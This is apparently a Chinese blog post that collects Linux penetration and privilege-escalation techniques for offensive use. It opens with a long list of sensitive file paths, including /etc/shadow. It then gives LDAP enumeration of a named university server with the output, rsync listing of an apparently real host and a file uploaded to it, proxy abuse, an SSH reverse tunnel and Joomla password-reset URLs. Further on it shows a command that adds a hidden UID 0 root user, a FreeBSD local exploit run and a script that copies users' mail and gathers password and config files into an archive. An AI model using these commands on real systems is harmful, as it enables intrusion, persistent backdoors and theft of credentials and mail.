LINUX渗透与提权总结

本文为Linux渗透与提权技巧总结篇,旨在收集各种Linux渗透技巧与提权版本,方便各位同学在日后的渗透测试中能够事半功倍。

Linux 系统下的一些常见路径:

001 /etc/passwd
002  
003 /etc/shadow
004  
005 /etc/fstab
006  
007 /etc/host.conf
008  
009 /etc/motd
010  
011 /etc/ld.so.conf
012  
013 /var/www/htdocs/index.php
014  
015 /var/www/conf/httpd.conf
016  
017 /var/www/htdocs/index.html
018  
019 /var/httpd/conf/php.ini
020  
021 /var/httpd/htdocs/index.php
022  
023 /var/httpd/conf/httpd.conf
024  
025 /var/httpd/htdocs/index.html
026  
027 /var/httpd/conf/php.ini
028  
029 /var/www/index.html
030  
031 /var/www/index.php
032  
033 /opt/www/conf/httpd.conf
034  
035 /opt/www/htdocs/index.php
036  
037 /opt/www/htdocs/index.html
038  
039 /usr/local/apache/htdocs/index.html
040  
041 /usr/local/apache/htdocs/index.php
042  
043 /usr/local/apache2/htdocs/index.html
044  
045 /usr/local/apache2/htdocs/index.php
046  
047 /usr/local/httpd2.2/htdocs/index.php
048  
049 /usr/local/httpd2.2/htdocs/index.html
050  
051 /tmp/apache/htdocs/index.html
052  
053 /tmp/apache/htdocs/index.php
054  
055 /etc/httpd/htdocs/index.php
056  
057 /etc/httpd/conf/httpd.conf
058  
059 /etc/httpd/htdocs/index.html
060  
061 /www/php/php.ini
062  
063 /www/php4/php.ini
064  
065 /www/php5/php.ini
066  
067 /www/conf/httpd.conf
068  
069 /www/htdocs/index.php
070  
071 /www/htdocs/index.html
072  
073 /usr/local/httpd/conf/httpd.conf
074  
075 /apache/apache/conf/httpd.conf
076  
077 /apache/apache2/conf/httpd.conf
078  
079 /etc/apache/apache.conf
080  
081 /etc/apache2/apache.conf
082  
083 /etc/apache/httpd.conf
084  
085 /etc/apache2/httpd.conf
086  
087 /etc/apache2/vhosts.d/00_default_vhost.conf
088  
089 /etc/apache2/sites-available/default
090  
091 /etc/phpmyadmin/config.inc.php
092  
093 /etc/mysql/my.cnf
094  
095 /etc/httpd/conf.d/php.conf
096  
097 /etc/httpd/conf.d/httpd.conf
098  
099 /etc/httpd/logs/error_log
100  
101 /etc/httpd/logs/error.log
102  
103 /etc/httpd/logs/access_log
104  
105 /etc/httpd/logs/access.log
106  
107 /home/apache/conf/httpd.conf
108  
109 /home/apache2/conf/httpd.conf
110  
111 /var/log/apache/error_log
112  
113 /var/log/apache/error.log
114  
115 /var/log/apache/access_log
116  
117 /var/log/apache/access.log
118  
119 /var/log/apache2/error_log
120  
121 /var/log/apache2/error.log
122  
123 /var/log/apache2/access_log
124  
125 /var/log/apache2/access.log
126  
127 /var/www/logs/error_log
128  
129 /var/www/logs/error.log
130  
131 /var/www/logs/access_log
132  
133 /var/www/logs/access.log
134  
135 /usr/local/apache/logs/error_log
136  
137 /usr/local/apache/logs/error.log
138  
139 /usr/local/apache/logs/access_log
140  
141 /usr/local/apache/logs/access.log
142  
143 /var/log/error_log
144  
145 /var/log/error.log
146  
147 /var/log/access_log
148  
149 /var/log/access.log
150  
151 /usr/local/apache/logs/access_logaccess_log.old
152  
153 /usr/local/apache/logs/error_logerror_log.old
154  
155 /etc/php.ini
156  
157 /bin/php.ini
158  
159 /etc/init.d/httpd
160  
161 /etc/init.d/mysql
162  
163 /etc/httpd/php.ini
164  
165 /usr/lib/php.ini
166  
167 /usr/lib/php/php.ini
168  
169 /usr/local/etc/php.ini
170  
171 /usr/local/lib/php.ini
172  
173 /usr/local/php/lib/php.ini
174  
175 /usr/local/php4/lib/php.ini
176  
177 /usr/local/php4/php.ini
178  
179 /usr/local/php4/lib/php.ini
180  
181 /usr/local/php5/lib/php.ini
182  
183 /usr/local/php5/etc/php.ini
184  
185 /usr/local/php5/php5.ini
186  
187 /usr/local/apache/conf/php.ini
188  
189 /usr/local/apache/conf/httpd.conf
190  
191 /usr/local/apache2/conf/httpd.conf
192  
193 /usr/local/apache2/conf/php.ini
194  
195 /etc/php4.4/fcgi/php.ini
196  
197 /etc/php4/apache/php.ini
198  
199 /etc/php4/apache2/php.ini
200  
201 /etc/php5/apache/php.ini
202  
203 /etc/php5/apache2/php.ini
204  
205 /etc/php/php.ini
206  
207 /etc/php/php4/php.ini
208  
209 /etc/php/apache/php.ini
210  
211 /etc/php/apache2/php.ini
212  
213 /web/conf/php.ini
214  
215 /usr/local/Zend/etc/php.ini
216  
217 /opt/xampp/etc/php.ini
218  
219 /var/local/www/conf/php.ini
220  
221 /var/local/www/conf/httpd.conf
222  
223 /etc/php/cgi/php.ini
224  
225 /etc/php4/cgi/php.ini
226  
227 /etc/php5/cgi/php.ini
228  
229 /php5/php.ini
230  
231 /php4/php.ini
232  
233 /php/php.ini
234  
235 /PHP/php.ini
236  
237 /apache/php/php.ini
238  
239 /xampp/apache/bin/php.ini
240  
241 /xampp/apache/conf/httpd.conf
242  
243 /NetServer/bin/stable/apache/php.ini
244  
245 /home2/bin/stable/apache/php.ini
246  
247 /home/bin/stable/apache/php.ini
248  
249 /var/log/mysql/mysql-bin.log
250  
251 /var/log/mysql.log
252  
253 /var/log/mysqlderror.log
254  
255 /var/log/mysql/mysql.log
256  
257 /var/log/mysql/mysql-slow.log
258  
259 /var/mysql.log
260  
261 /var/lib/mysql/my.cnf
262  
263 /usr/local/mysql/my.cnf
264  
265 /usr/local/mysql/bin/mysql
266  
267 /etc/mysql/my.cnf
268  
269 /etc/my.cnf
270  
271 /usr/local/cpanel/logs
272  
273 /usr/local/cpanel/logs/stats_log
274  
275 /usr/local/cpanel/logs/access_log
276  
277 /usr/local/cpanel/logs/error_log
278  
279 /usr/local/cpanel/logs/license_log
280  
281 /usr/local/cpanel/logs/login_log
282  
283 /usr/local/cpanel/logs/stats_log
284  
285 /usr/local/share/examples/php4/php.ini
286  
287 /usr/local/share/examples/php/php.ini
288  
289 /usr/local/tomcat5527/bin/version.sh
290  
291 /usr/share/tomcat6/bin/startup.sh
292  
293 /usr/tomcat6/bin/startup.sh

 liunx 相关提权渗透技巧总结,一、ldap 渗透技巧:

1 1.cat /etc/nsswitch

看看密码登录策略我们可以看到使用了file ldap模式

1 2.less /etc/ldap.conf
2  
3 base ou=People,dc=unix-center,dc=net

找到ou,dc,dc设置

3.查找管理员信息

匿名方式

1 ldapsearch -x -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2

有密码形式

1 ldapsearch -x -W -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2

4.查找10条用户记录

1 ldapsearch -h 192.168.2.2 -x -z 10 -p 指定端口

实战:

1 1.cat /etc/nsswitch

看看密码登录策略我们可以看到使用了file ldap模式

1 2.less /etc/ldap.conf
2  
3 base ou=People,dc=unix-center,dc=net

找到ou,dc,dc设置

3.查找管理员信息

匿名方式

1 ldapsearch -x -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2

有密码形式

1 ldapsearch -x -W -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2

4.查找10条用户记录

1 ldapsearch -h 192.168.2.2 -x -z 10 -p 指定端口

渗透实战:

1.返回所有的属性

01 ldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s sub "objectclass=*"
02  
03 version: 1
04  
05 dn: dc=ruc,dc=edu,dc=cn
06  
07 dc: ruc
08  
09 objectClass: domain
10  
11 dn: uid=manager,dc=ruc,dc=edu,dc=cn
12  
13 uid: manager
14  
15 objectClass: inetOrgPerson
16  
17 objectClass: organizationalPerson
18  
19 objectClass: person
20  
21 objectClass: top
22  
23 sn: manager
24  
25 cn: manager
26  
27 dn: uid=superadmin,dc=ruc,dc=edu,dc=cn
28  
29 uid: superadmin
30  
31 objectClass: inetOrgPerson
32  
33 objectClass: organizationalPerson
34  
35 objectClass: person
36  
37 objectClass: top
38  
39 sn: superadmin
40  
41 cn: superadmin
42  
43 dn: uid=admin,dc=ruc,dc=edu,dc=cn
44  
45 uid: admin
46  
47 objectClass: inetOrgPerson
48  
49 objectClass: organizationalPerson
50  
51 objectClass: person
52  
53 objectClass: top
54  
55 sn: admin
56  
57 cn: admin
58  
59 dn: uid=dcp_anonymous,dc=ruc,dc=edu,dc=cn
60  
61 uid: dcp_anonymous
62  
63 objectClass: top
64  
65 objectClass: person
66  
67 objectClass: organizationalPerson
68  
69 objectClass: inetOrgPerson
70  
71 sn: dcp_anonymous
72  
73 cn: dcp_anonymous
2.查看基类
1 bash-3.00# ldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s base "objectclass=*" | more version: 1 dn: dc=ruc,dc=edu,dc=cn dc: ruc objectClass: domain

3.查找

001 bash-3.00# ldapsearch -h 192.168.7.33 -b "" -s base "objectclass=*"
002  
003 version: 1
004  
005 dn:
006  
007 objectClass: top
008  
009 namingContexts: dc=ruc,dc=edu,dc=cn
010  
011 supportedExtension: 2.16.840.1.113730.3.5.7
012  
013 supportedExtension: 2.16.840.1.113730.3.5.8
014  
015 supportedExtension: 1.3.6.1.4.1.4203.1.11.1
016  
017 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.25
018  
019 supportedExtension: 2.16.840.1.113730.3.5.3
020  
021 supportedExtension: 2.16.840.1.113730.3.5.5
022  
023 supportedExtension: 2.16.840.1.113730.3.5.6
024  
025 supportedExtension: 2.16.840.1.113730.3.5.4
026  
027 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.1
028  
029 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.2
030  
031 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.3
032  
033 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.4
034  
035 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.5
036  
037 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.6
038  
039 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.7
040  
041 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.8
042  
043 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.9
044  
045 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.23
046  
047 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.11
048  
049 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.12
050  
051 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.13
052  
053 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.14
054  
055 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.15
056  
057 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.16
058  
059 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.17
060  
061 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.18
062  
063 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.19
064  
065 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.21
066  
067 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.22
068  
069 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.24
070  
071 supportedExtension: 1.3.6.1.4.1.1466.20037
072  
073 supportedExtension: 1.3.6.1.4.1.4203.1.11.3
074  
075 supportedControl: 2.16.840.1.113730.3.4.2
076  
077 supportedControl: 2.16.840.1.113730.3.4.3
078  
079 supportedControl: 2.16.840.1.113730.3.4.4
080  
081 supportedControl: 2.16.840.1.113730.3.4.5
082  
083 supportedControl: 1.2.840.113556.1.4.473
084  
085 supportedControl: 2.16.840.1.113730.3.4.9
086  
087 supportedControl: 2.16.840.1.113730.3.4.16
088  
089 supportedControl: 2.16.840.1.113730.3.4.15
090  
091 supportedControl: 2.16.840.1.113730.3.4.17
092  
093 supportedControl: 2.16.840.1.113730.3.4.19
094  
095 supportedControl: 1.3.6.1.4.1.42.2.27.9.5.2
096  
097 supportedControl: 1.3.6.1.4.1.42.2.27.9.5.6
098  
099 supportedControl: 1.3.6.1.4.1.42.2.27.9.5.8
100  
101 supportedControl: 1.3.6.1.4.1.42.2.27.8.5.1
102  
103 supportedControl: 1.3.6.1.4.1.42.2.27.8.5.1
104  
105 supportedControl: 2.16.840.1.113730.3.4.14
106  
107 supportedControl: 1.3.6.1.4.1.1466.29539.12
108  
109 supportedControl: 2.16.840.1.113730.3.4.12
110  
111 supportedControl: 2.16.840.1.113730.3.4.18
112  
113 supportedControl: 2.16.840.1.113730.3.4.13
114  
115 supportedSASLMechanisms: EXTERNAL
116  
117 supportedSASLMechanisms: DIGEST-MD5
118  
119 supportedLDAPVersion: 2
120  
121 supportedLDAPVersion: 3
122  
123 vendorName: Sun Microsystems, Inc.
124  
125 vendorVersion: Sun-Java(tm)-System-Directory/6.2
126  
127 dataversion: 020090516011411
128  
129 netscapemdsuffix: cn=ldap://dc=webA:389
130  
131 supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA
132  
133 supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
134  
135 supportedSSLCiphers: TLS_DHE_RSA_WITH_AES_256_CBC_SHA
136  
137 supportedSSLCiphers: TLS_DHE_DSS_WITH_AES_256_CBC_SHA
138  
139 supportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_256_CBC_SHA
140  
141 supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA
142  
143 supportedSSLCiphers: TLS_RSA_WITH_AES_256_CBC_SHA
144  
145 supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_RC4_128_SHA
146  
147 supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA
148  
149 supportedSSLCiphers: TLS_ECDHE_RSA_WITH_RC4_128_SHA
150  
151 supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
152  
153 supportedSSLCiphers: TLS_DHE_DSS_WITH_RC4_128_SHA
154  
155 supportedSSLCiphers: TLS_DHE_RSA_WITH_AES_128_CBC_SHA
156  
157 supportedSSLCiphers: TLS_DHE_DSS_WITH_AES_128_CBC_SHA
158  
159 supportedSSLCiphers: TLS_ECDH_RSA_WITH_RC4_128_SHA
160  
161 supportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_128_CBC_SHA
162  
163 supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_RC4_128_SHA
164  
165 supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA
166  
167 supportedSSLCiphers: SSL_RSA_WITH_RC4_128_MD5
168  
169 supportedSSLCiphers: SSL_RSA_WITH_RC4_128_SHA
170  
171 supportedSSLCiphers: TLS_RSA_WITH_AES_128_CBC_SHA
172  
173 supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA
174  
175 supportedSSLCiphers: TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA
176  
177 supportedSSLCiphers: SSL_DHE_RSA_WITH_3DES_EDE_CBC_SHA
178  
179 supportedSSLCiphers: SSL_DHE_DSS_WITH_3DES_EDE_CBC_SHA
180  
181 supportedSSLCiphers: TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA
182  
183 supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA
184  
185 supportedSSLCiphers: SSL_RSA_FIPS_WITH_3DES_EDE_CBC_SHA
186  
187 supportedSSLCiphers: SSL_RSA_WITH_3DES_EDE_CBC_SHA
188  
189 supportedSSLCiphers: SSL_DHE_RSA_WITH_DES_CBC_SHA
190  
191 supportedSSLCiphers: SSL_DHE_DSS_WITH_DES_CBC_SHA
192  
193 supportedSSLCiphers: SSL_RSA_FIPS_WITH_DES_CBC_SHA
194  
195 supportedSSLCiphers: SSL_RSA_WITH_DES_CBC_SHA
196  
197 supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_RC4_56_SHA
198  
199 supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_DES_CBC_SHA
200  
201 supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC4_40_MD5
202  
203 supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC2_CBC_40_MD5
204  
205 supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_NULL_SHA
206  
207 supportedSSLCiphers: TLS_ECDHE_RSA_WITH_NULL_SHA
208  
209 supportedSSLCiphers: TLS_ECDH_RSA_WITH_NULL_SHA
210  
211 supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_NULL_SHA
212  
213 supportedSSLCiphers: SSL_RSA_WITH_NULL_SHA
214  
215 supportedSSLCiphers: SSL_RSA_WITH_NULL_MD5
216  
217 supportedSSLCiphers: SSL_CK_RC4_128_WITH_MD5
218  
219 supportedSSLCiphers: SSL_CK_RC2_128_CBC_WITH_MD5
220  
221 supportedSSLCiphers: SSL_CK_DES_192_EDE3_CBC_WITH_MD5
222  
223 supportedSSLCiphers: SSL_CK_DES_64_CBC_WITH_MD5
224  
225 supportedSSLCiphers: SSL_CK_RC4_128_EXPORT40_WITH_MD5
226  
227 supportedSSLCiphers: SSL_CK_RC2_128_CBC_EXPORT40_WITH_MD5
 

 liunx 相关提权渗透技巧总结,二、NFS 渗透技巧:

列举IP:

1 showmount -e ip

 liunx 相关提权渗透技巧总结,三、rsync渗透技巧:

1.查看rsync服务器上的列表:

01 rsync 210.51.X.X::
02  
03 finance
04  
05 img_finance
06  
07 auto
08  
09 img_auto
10  
11 html_cms
12  
13 img_cms
14  
15 ent_cms
16  
17 ent_img
18  
19 ceshi
20  
21 res_img
22  
23 res_img_c2
24  
25 chip
26  
27 chip_c2
28  
29 ent_icms
30  
31 games
32  
33 gamesimg
34  
35 media
36  
37 mediaimg
38  
39 fashion
40  
41 res-fashion
42  
43 res-fo
44  
45 taobao-home
46  
47 res-taobao-home
48  
49 house
50  
51 res-house
52  
53 res-home
54  
55 res-edu
56  
57 res-ent
58  
59 res-labs
60  
61 res-news
62  
63 res-phtv
64  
65 res-media
66  
67 home
68  
69 edu
70  
71 news
72  
73 res-book

看相应的下级目录(注意一定要在目录后面添加上/)

1 rsync 210.51.X.X::htdocs_app/
2  
3 rsync 210.51.X.X::auto/
4  
5 rsync 210.51.X.X::edu/

2.下载rsync服务器上的配置文件

1 rsync -avz 210.51.X.X::htdocs_app/ /tmp/app/

3.向上更新rsync文件(成功上传,不会覆盖)

1 rsync -avz nothack.php 210.51.X.X::htdocs_app/warn/
2  
3 http://app.finance.xxx.com/warn/nothack.txt

 liunx 相关提权渗透技巧总结,四、squid渗透技巧:

1 nc -vv 91ri.org 80
2  
3 GET HTTP://www.sina.com / HTTP/1.0
4  
5 GET HTTP://WWW.sina.com:22 / HTTP/1.0

 liunx 相关提权渗透技巧总结,五、SSH端口转发:

1 ssh -C -f -N -g -R 44:127.0.0.1:22 cnbird@ip

 liunx 相关提权渗透技巧总结,六、joomla渗透小技巧:

确定版本:

1 index.php?option=com_content&view=article&id=30:what-languages-are-supported-by-joomla-15&catid=32:languages&Itemid=47

重新设置密码:

1 index.php?option=com_user&view=reset&layout=confirm

 liunx 相关提权渗透技巧总结,七、Linux添加UID为0的root用户:

1 useradd -o -u 0 nothack

 liunx 相关提权渗透技巧总结,八、freebsd本地提权:

01 [argp@julius ~]$ uname -rsi
02  
03 * freebsd 7.3-RELEASE GENERIC
04  
05 * [argp@julius ~]$ sysctl vfs.usermount
06  
07 * vfs.usermount: 1
08  
09 * [argp@julius ~]$ id
10  
11 * uid=1001(argp) gid=1001(argp) groups=1001(argp)
12  
13 * [argp@julius ~]$ gcc -Wall nfs_mount_ex.c -o nfs_mount_ex
14  
15 * [argp@julius ~]$ ./nfs_mount_ex
16  
17 *
18  
19 calling nmount()

 tar 文件夹打包:

1、tar打包:

1 tar -cvf /home/public_html/*.tar /home/public_html/--exclude=排除文件*.gif  排除目录 /xx/xx/*
2  
3 alzip打包(韩国) alzip -a D:\WEB d:\web*.rar

{

注:

关于tar的打包方式,linux不以扩展名来决定文件类型。

若压缩的话tar -ztf *.tar.gz   查看压缩包里内容     tar -zxf *.tar.gz 解压

那么用这条比较好

1 tar -czf /home/public_html/*.tar.gz /home/public_html/--exclude= 排除文件*.gif   排除目录 /xx/xx/*

}

系统信息收集:

view source
01 for linux:
02  
03 #!/bin/bash
04  
05 echo #######geting sysinfo####
06  
07 echo ######usage: ./getinfo.sh >/tmp/sysinfo.txt
08  
09 echo #######basic infomation##
10  
11 cat /proc/meminfo
12  
13 echo
14  
15 cat /proc/cpuinfo
16  
17 echo
18  
19 rpm -qa 2>/dev/null
20  
21 ######stole the mail......######
22  
23 cp -a /var/mail /tmp/getmail 2>/dev/null
24  
25 echo 'u'r id is' `id`
26  
27 echo ###atq&crontab#####
28  
29 atq
30  
31 crontab -l
32  
33 echo #####about var#####
34  
35 set
36  
37 echo #####about network###
38  
39 ####this is then point in pentest,but i am a new bird,so u need to add some in it
40  
41 cat /etc/hosts
42  
43 hostname
44  
45 ipconfig -a
46  
47 arp -v
48  
49 echo ########user####
50  
51 cat /etc/passwd|grep -i sh
52  
53 echo ######service####
54  
55 chkconfig --list
56  
57 for i in {oracle,mysql,tomcat,samba,apache,ftp}
58  
59 cat /etc/passwd|grep -i $i
60  
61 done
62  
63 locate passwd >/tmp/password 2>/dev/null
64  
65 sleep 5
66  
67 locate password >>/tmp/password 2>/dev/null
68  
69 sleep 5
70  
71 locate conf >/tmp/sysconfig 2>dev/null
72  
73 sleep 5
74  
75 locate config >>/tmp/sysconfig 2>/dev/null
76  
77 sleep 5
78  
79 ###maybe can use "tree /"###
80  
81 echo ##packing up#########
82  
83 tar cvf getsysinfo.tar /tmp/getmail /tmp/password /tmp/sysconfig
84  
85 rm -rf /tmp/getmail /tmp/password /tmp/sysconfig
 

你可能感兴趣的:(LINUX渗透与提权总结)